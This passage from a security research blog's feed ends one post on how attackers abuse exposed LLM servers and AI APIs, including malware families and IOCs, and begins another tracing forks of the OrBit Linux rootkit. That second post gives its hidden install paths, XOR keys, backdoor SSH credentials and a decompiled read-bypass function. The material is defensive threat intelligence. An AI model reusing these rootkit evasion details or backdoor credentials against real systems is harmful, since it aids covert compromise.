scan found at least one LM Studio host actively serving
&lt;code&gt;llama3.3-8b-instruct-thinking-heretic-uncensored-claude-4.5-opus-high-reasoning-i1&lt;/code&gt;.
Token quota is equally unconstrained, bounded only by the victim&amp;rsquo;s hardware
rather than a billing cap. Capability and tool support vary by host, but that
variance is what makes the route durable at scale. No individual host needs to
run a frontier model.&lt;/p&gt;
&lt;p&gt;The scoring explains why exposed servers are the most durable route, even
though they don&amp;rsquo;t top every dimension. They are the only route where
non-resistance and token quota both max out. The other three are each
compromised on at least one of those two axes.&lt;/p&gt;
&lt;h2&gt;Cases Found in the Wild&lt;span class="hx:absolute hx:-mt-20" id="cases-found-in-the-wild"&gt;&lt;/span&gt;
&lt;a href="#cases-found-in-the-wild" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Threat actors are now wiring malware to live LLM APIs, using them to generate
malicious logic at runtime rather than embedding static code in the payload.
Instead of scripting separate execution flows for different host conditions,
the malware queries an LLM while running, determines whether the target appears
to be a personal machine, a server, or an industrial controller, and then
generates tailored commands or code accordingly. This shift matters because
dynamically generated logic has no fixed signature to detect. Researchers have
identified five malware families doing this.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Malware name&lt;/th&gt;
&lt;th&gt;Capabilities&lt;/th&gt;
&lt;th&gt;AI Provider&lt;/th&gt;
&lt;th&gt;Runtime model source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;MalTerminal&lt;/td&gt;
&lt;td&gt;Reverse shell or ransomware generation&lt;/td&gt;
&lt;td&gt;OpenAI GPT-4 (deprecated chat completions endpoint)&lt;/td&gt;
&lt;td&gt;Hardcoded API key&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LameHug/PROMPTSTEAL&lt;/td&gt;
&lt;td&gt;Reconnaissance and infostealer&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Qwen 2.5-Coder-32B-Instruct&lt;/code&gt; via HuggingFace&lt;/td&gt;
&lt;td&gt;Public HuggingFace Inference API (no embedded key observed)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Ransomware 3.0/PROMPTLOCK&lt;/td&gt;
&lt;td&gt;Ransomware with exfiltration and wipe capability&lt;/td&gt;
&lt;td&gt;&lt;code&gt;gpt-oss-20b&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Local Ollama API on the infected host&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PROMPTFLUX&lt;/td&gt;
&lt;td&gt;Dropper with AI-driven polymorphism&lt;/td&gt;
&lt;td&gt;Google Gemini (&lt;code&gt;gemini-1.5-flash-latest&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Hardcoded API key&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;QUIETVAULT&lt;/td&gt;
&lt;td&gt;GitHub/NPM token stealer that uses AI to find additional secrets&lt;/td&gt;
&lt;td&gt;Whatever AI CLI is installed on the victim (provider not named)&lt;/td&gt;
&lt;td&gt;AI CLI tools already on the infected host&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;MalTerminal and PROMPTFLUX both use a hardcoded API key to connect to a
commercial provider when needed. MalTerminal uses OpenAI GPT-4 via the
now-retired chat-completions endpoint to create reverse shells or ransomware.
PROMPTFLUX connects to Google &lt;code&gt;gemini-1.5-flash-latest&lt;/code&gt; to rewrite its own
VBScript source code between runs, making it harder to detect.&lt;/p&gt;
&lt;p&gt;LameHug, also known as PROMPTSTEAL, uses HuggingFace&amp;rsquo;s Inference API to run
&lt;code&gt;Qwen 2.5-Coder-32B-Instruct&lt;/code&gt; for Windows commands to support reconnaissance
and data theft. HuggingFace requires an API token for each request, but
&lt;a href="https://huggingface.co/docs/hub/rate-limits"target="_blank" rel="noopener"&gt;free accounts&lt;/a&gt; don&amp;rsquo;t need a
payment method and allow a few hundred requests per hour per API token.
Attackers can easily create and rotate these API tokens, giving them the same
access as stolen keys but with less hassle.&lt;/p&gt;
&lt;p&gt;PROMPTLOCK is a proof-of-concept AI-powered ransomware prototype, often called
&amp;ldquo;Ransomware 3.0,&amp;rdquo; developed by researchers at
&lt;a href="https://engineering.nyu.edu/news/large-language-models-can-execute-complete-ransomware-attacks-autonomously-nyu-tandon-research"target="_blank" rel="noopener"&gt;NYU&amp;rsquo;s Tandon School of Engineering&lt;/a&gt;.
The Go binary invokes &lt;code&gt;gpt-oss-20b&lt;/code&gt; via a local Ollama API running on the
infected host to generate Lua scripts that perform file listing, encryption,
exfiltration, and (unfinished) wipe logic. This is a bring-your-own-model: no
outbound calls, no provider-side billing trail, and no way to scale beyond the
victim&amp;rsquo;s own hardware.&lt;/p&gt;
&lt;p&gt;QUIETVAULT is a credential-theft variant. The JavaScript stealer exfiltrates
GitHub and NPM tokens to an attacker-controlled GitHub repo and then hands off
the filesystem search for additional secrets to whatever AI CLI is already
installed on the victim, so the stolen credentials are an active on-host AI
session rather than a bare API key.&lt;/p&gt;
&lt;p&gt;Looking at the four main routes discussed in this post, LameHug/PROMPTSTEAL is
the best example of the free-tier method, since it calls HuggingFace&amp;rsquo;s
Inference API directly. MalTerminal and PROMPTFLUX both use hardcoded API keys,
but it&amp;rsquo;s unclear where those keys came from, so they could fit into the
free-tier, crypto-middleman, or stolen-keys categories. QUIETVAULT is a twist
on the stolen-credential method, using an on-host AI session instead of just a
key. PROMPTLOCK is different because it uses a local model and only works on
one victim at a time, so it doesn&amp;rsquo;t fit into the four main routes and isn&amp;rsquo;t
discussed further.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Across four routes: offensive LLMs for sale, free-tier and keyless public APIs,
hardcoded keys in distributed artifacts, and exposed LLM servers on victim
infrastructure, the most durable access is the last one. The precondition for
abuse is almost never a sophisticated exploit. It is an unauthenticated port
facing the internet.&lt;/p&gt;
&lt;p&gt;AI is the defining technology of this moment. It extends what a single person
or small team can do and accelerates work that used to take weeks. AI is being
integrated into more and more areas, from personal agents and email writing to
some vulnerability research. The wow factor is real. But an LLM server is still
a service running on a host. It listens on a port, speaks a protocol, and has
an attack surface. The failure modes in this report; misconfiguration, leaked
credentials, unpatched CVEs, open ports, are the same ones that produced years
of incidents on Docker, Kubernetes, cloud storage, Redis, Elasticsearch, and
bare Linux servers. The tooling is new. The mistakes are not.&lt;/p&gt;
&lt;p&gt;Two things follow. The operator is still responsible for the basics:
authenticate the service, keep it off the public internet unless there is a
reason to expose it, patch the known CVEs, and audit what is running. These are
not AI-specific requirements. They are the same ones we have been making for
every networked service. An exposed Ollama instance serving a stranger&amp;rsquo;s
prompts is not a failure of the model or the vendor that shipped it. It is a
failure of whoever put it on the internet without a password. You broke it. You
pay for it.&lt;/p&gt;
&lt;h2&gt;IOCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;SHA-256&lt;/th&gt;
&lt;th&gt;Payload&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ecd3b1a0e4832f1dc72be84c3c838ae4e29637c1cff4bfa70649cda90fa7a8ce&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Mimikatz binaries (carrying AI API keys)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;153d7cdca3cb96023a2ee8e3de49b29ced60ffc865da04c3c6ef2b445b056d8f&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;0c1a409dd791ee8f7e157c455d9c35671bd81d17b562c7acd73f9f26401533ba&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;a9dc00aeae6c245d76d873e675b555f044ecf94a5ece031a1e6ca30223beb905&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Malicious binary without family attribution (carrying AI API keys)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;99308a3f00490e8138974faafa3ea5ae089459b2500e097ccc0ed042b6a0c2af&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;SolarMarker (HuggingFace key)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;796e81c1b31f443ab3437663af97fe41b25bbf8ab7abcd0637238a568b66aa9d&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SystemSettings.exe&lt;/code&gt; (OpenAI, Replicate, Voyage keys)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;</description></item><item><title>OrBit (Re)turns: Tracking an Open-Source Linux Rootkit Across Four Years of Forks and Deployments</title><link>https://research.intezer.com/blog/2026/05/orbit-returns/</link><pubDate>Thu, 14 May 2026 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2026/05/orbit-returns/</guid><description>
&lt;h2&gt;Introduction&lt;span class="hx:absolute hx:-mt-20" id="introduction"&gt;&lt;/span&gt;
&lt;a href="#introduction" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In July 2022, we
&lt;a href="https://intezer.com/blog/orbit-new-undetected-linux-threat/"target="_blank" rel="noopener"&gt;published the first analysis&lt;/a&gt;
of OrBit, a then-undocumented Linux userland-rootkit that stood out for its
comprehensive libc hooking, SSH backdoor access, and PAM-based credential
harvesting. At the time, OrBit appeared as a single sample with a single
operator fingerprint, and the codebase itself looked customized.&lt;/p&gt;
&lt;p&gt;It wasn&amp;rsquo;t. As we will show below, OrBit is a repackaged and selectively
weaponized build of &lt;a href="https://github.com/ldpreload/Medusa"target="_blank" rel="noopener"&gt;Medusa&lt;/a&gt;, an
open-source LD_PRELOAD rootkit published on GitHub in December 2022. The story
of OrBit&amp;rsquo;s four-year evolution is not one of novel development; it&amp;rsquo;s the story
of how a publicly available rootkit was forked, configured, and redeployed.&lt;/p&gt;
&lt;p&gt;Nearly four years later, OrBit is still in the wild, and it has not stood
still. Hunting across VirusTotal, we pulled more than a dozen samples spanning
2022 through 2026 and walked each one through static and differential analysis.
What we discovered is not a single evolving binary but two parallel lineages: a
full-featured &amp;ldquo;Lineage A&amp;rdquo; build that tracks closely with the 2022 original, and
a lite &amp;ldquo;Lineage B&amp;rdquo; fork that drops entire capability domains (PAM, pcap,
TCP-port hiding) in exchange for a smaller footprint. Along the way, the
operators rotate XOR keys, shuffle install paths, swap backdoor credentials,
add auditd-evasion hooks, and eventually bolt on a service-side PAM
impersonation primitive.&lt;/p&gt;
&lt;p&gt;This blog picks up where the 2022 analysis left off. We focus on what changed,
when, and why it matters for defenders. For each epoch, we enumerate the
samples, call out the lineage, and break down the meaningful changes:
credential changes, hook-set diffs, new evasion behavior, and operator
tradecraft.&lt;/p&gt;
&lt;h2&gt;Background: What is OrBit?&lt;span class="hx:absolute hx:-mt-20" id="background-what-is-orbit"&gt;&lt;/span&gt;
&lt;a href="#background-what-is-orbit" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;For readers unfamiliar with the original analysis, OrBit is a Linux
userland-rootkit deployed as a shared library (.so) that achieves persistence
by patching the dynamic linker, specifically modifying ld.so to ensure the
malicious library is loaded into every process on the system. It operates as a
passive implant with no command-and-control communication; instead, the
attacker connects in through an SSH backdoor. Once installed, OrBit hooks into
PAM functions to harvest credentials from SSH and sudo authentication attempts,
storing the captured passwords locally.&lt;/p&gt;
&lt;p&gt;Its evasion capabilities are comprehensive, hooking over forty libc functions
to hide files, processes, and network connections from administrators and
security tools alike. The malware stores its harvested credentials and
configuration data in &lt;code&gt;/lib/libntpVnQE6mk/&lt;/code&gt;, a directory that remains invisible
to standard enumeration thanks to the rootkit&amp;rsquo;s own hooks.&lt;/p&gt;
&lt;h3&gt;July 2002&lt;span class="hx:absolute hx:-mt-20" id="july-2002"&gt;&lt;/span&gt;
&lt;a href="#july-2002" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hash&lt;/th&gt;
&lt;th&gt;XOR&lt;/th&gt;
&lt;th&gt;Working dir&lt;/th&gt;
&lt;th&gt;SSH Username&lt;/th&gt;
&lt;th&gt;SSH Password&lt;/th&gt;
&lt;th&gt;# Exports&lt;/th&gt;
&lt;th&gt;# Hooks&lt;/th&gt;
&lt;th&gt;Dropper&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;40b5127c&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/libntpVnQE6mk/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;2l8&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;c4ss0ul3tt3&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;66&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;&lt;code&gt;f1612924&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;We will refer to this variant as Lineage A &amp;ldquo;Full&amp;rdquo; build of OrBit.&lt;/p&gt;
&lt;h2&gt;OrBit Variants Through The Years&lt;span class="hx:absolute hx:-mt-20" id="orbit-variants-through-the-years"&gt;&lt;/span&gt;
&lt;a href="#orbit-variants-through-the-years" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In our research, we collected samples from VirusTotal. Unlike PE files, ELF
files don’t include a compilation timestamp, so we started by aggregating the
samples by the date they were submitted to VirusTotal. To track the samples on
the blog, we use the first 8 characters of each sample&amp;rsquo;s SHA-256. At the bottom
of the blog, you can find the full list of IOCs.&lt;/p&gt;
&lt;h3&gt;December 2022&lt;span class="hx:absolute hx:-mt-20" id="december-2022"&gt;&lt;/span&gt;
&lt;a href="#december-2022" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The first version shows a slight change: the username and password for the SSH
connection, and the exported functions. Credential mechanism shift: &lt;code&gt;40b5127c&lt;/code&gt;
resolved the backdoor username dynamically via the getpwuid hook; &lt;code&gt;ec7462c3&lt;/code&gt;
dropped that hook entirely and hardcodes &lt;code&gt;adm1n&lt;/code&gt; directly in the XOR-encrypted
string table. The working folder was changed to &lt;strong&gt;libseconf&lt;/strong&gt;. For the most
part, the later variants will use this path.&lt;/p&gt;
&lt;p&gt;All other capabilities are identical: file I/O interception, stat hiding, PAM
credential capture, TCP port hiding
(alloc_tcp_ports/remove_port/tcp_port_hidden), load monitoring
(.showload/.maxload), pcap sniffing, LD_PRELOAD management, log suppression,
and process hiding.&lt;/p&gt;
&lt;p&gt;The transition from 2022 to 2023 is essentially a redeployment with new
credentials and a more convincing install path, plus a minor simplification
(dropping dynamic UID lookup in favor of a hardcoded username).&lt;/p&gt;
&lt;p&gt;The rootkit&amp;rsquo;s hook surface stayed stable.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hash&lt;/th&gt;
&lt;th&gt;XOR&lt;/th&gt;
&lt;th&gt;Working dir&lt;/th&gt;
&lt;th&gt;SSH Username&lt;/th&gt;
&lt;th&gt;SSH Password&lt;/th&gt;
&lt;th&gt;# Exports&lt;/th&gt;
&lt;th&gt;# Hooks&lt;/th&gt;
&lt;th&gt;Dropper&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ec7462c3&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/libseconf/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;adm1n&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;asdfasdf&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;67&lt;/td&gt;
&lt;td&gt;53&lt;/td&gt;
&lt;td&gt;&lt;code&gt;8ea420d9&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;Samples From 2023&lt;span class="hx:absolute hx:-mt-20" id="samples-from-2023"&gt;&lt;/span&gt;
&lt;a href="#samples-from-2023" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hash&lt;/th&gt;
&lt;th&gt;XOR&lt;/th&gt;
&lt;th&gt;Working dir&lt;/th&gt;
&lt;th&gt;SSH Username&lt;/th&gt;
&lt;th&gt;SSH Password&lt;/th&gt;
&lt;th&gt;# Exports&lt;/th&gt;
&lt;th&gt;# Hooks&lt;/th&gt;
&lt;th&gt;Dropper&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;d419a9b1&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/fuckwhitehatshome/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;fuckwhitehatsuser&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;fuckwhitehatspass&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;67&lt;/td&gt;
&lt;td&gt;53&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;296d28eb&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/libseconf/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;adm1n&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;asdfasdf&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;65&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;3ba6c174&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/libseconf/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;adm1n&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(not present)&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;49&lt;/td&gt;
&lt;td&gt;&lt;code&gt;26082cd3&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;4203271c&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0xA2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/lib/libseconf/&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;b4ph0m3t0&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(not present)&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;49&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The d419a9b1 sample stands out for the operator’s choice of the install path
(/lib/fuckwhitehatshome/) and the SSH username and password. No other known
samples use these strings, suggesting a different operator or persona authored
this particular build rather than it simply being a different deployment of the
same toolkit. Functionally, it carries the full 2022-era hook set, with 65
exports.&lt;/p&gt;
&lt;p&gt;The 296d28eb sample is a full-featured build that uses the libseconf path and
the same SSH credentials as ec7462c3. But this sample also has an evolutionary
step: dropped TCP port hiding, added the exported xread function. This is not
an LD_PRELOAD hook on a system library; it’s a wrapper that calls
syscall(SYS_read) directly, bypassing the rootkit’s own hooked read().&lt;/p&gt;
&lt;p&gt;The rootkit hooks the libc read() function; the hook filters out rootkit
artifacts from files such as/proc/net/tcp and directory listings. Some C
programs, such as &lt;a href="https://github.com/git/git/blob/master/wrapper.c#L228"target="_blank" rel="noopener"&gt;Git&lt;/a&gt;,
define their own internal xread() helper that wraps read() to handle partial
reads and EINTR. Normally, these internal helpers call libc read(), which the
rootkit intercepts and filters. By exporting its own xread, which directly
calls syscall (&lt;a href="https://filippo.io/linux-syscall-table/"target="_blank" rel="noopener"&gt;SYS_read&lt;/a&gt;), the
rootkit shadows these program-internal helpers with a version that bypasses its
own read hook entirely. This is a compatibility fix: without it, any program
that defines xread would receive the rootkit’s filtered output through its core
I/O path, potentially corrupting SSH protocol streams, breaking git operations,
or causing other malfunctions that could expose the rootkit’s presence. The
hook ensures that programs continue to function normally while the rootkit’s
read interception remains active for standard libc callers.&lt;/p&gt;
&lt;p&gt;This variant is still part of Lineage A.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-c" data-lang="c"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;0041724&lt;/span&gt;&lt;span class="mi"&gt;9&lt;/span&gt; &lt;span class="kt"&gt;uint64_t&lt;/span&gt; &lt;span class="nf"&gt;xread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int32_t&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int64_t&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int32_t&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;0041724&lt;/span&gt;&lt;span class="mi"&gt;9&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;0041724&lt;/span&gt;&lt;span class="mi"&gt;9&lt;/span&gt; &lt;span class="kt"&gt;int32_t&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;0041725&lt;/span&gt;&lt;span class="n"&gt;b&lt;/span&gt; &lt;span class="kt"&gt;int32_t&lt;/span&gt; &lt;span class="n"&gt;bytes_read&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;00417262&lt;/span&gt; &lt;span class="kt"&gt;int32_t&lt;/span&gt; &lt;span class="n"&gt;var_c&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;00417262&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;004172&lt;/span&gt;&lt;span class="n"&gt;ad&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;004172&lt;/span&gt;&lt;span class="n"&gt;ad&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;004172&lt;/span&gt;&lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="c1"&gt;// SYS_read
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;&lt;/span&gt;&lt;span class="mo"&gt;004172&lt;/span&gt;&lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="kt"&gt;int32_t&lt;/span&gt; &lt;span class="n"&gt;read_result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;syscall&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;uint64_t&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;uint64_t&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;004172&lt;/span&gt;&lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;004172&lt;/span&gt;&lt;span class="mi"&gt;96&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;read_result&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;004172&lt;/span&gt;&lt;span class="mi"&gt;98&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;uint64_t&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bytes_read&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;004172&lt;/span&gt;&lt;span class="mi"&gt;98&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;004172&lt;/span&gt;&lt;span class="n"&gt;a0&lt;/span&gt; &lt;span class="n"&gt;bytes_read&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;read_result&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;004172&lt;/span&gt;&lt;span class="n"&gt;a6&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;-=&lt;/span&gt; &lt;span class="n"&gt;read_result&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;004172&lt;/span&gt;&lt;span class="n"&gt;ad&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mo"&gt;004172&lt;/span&gt;&lt;span class="n"&gt;ad&lt;/span&gt;
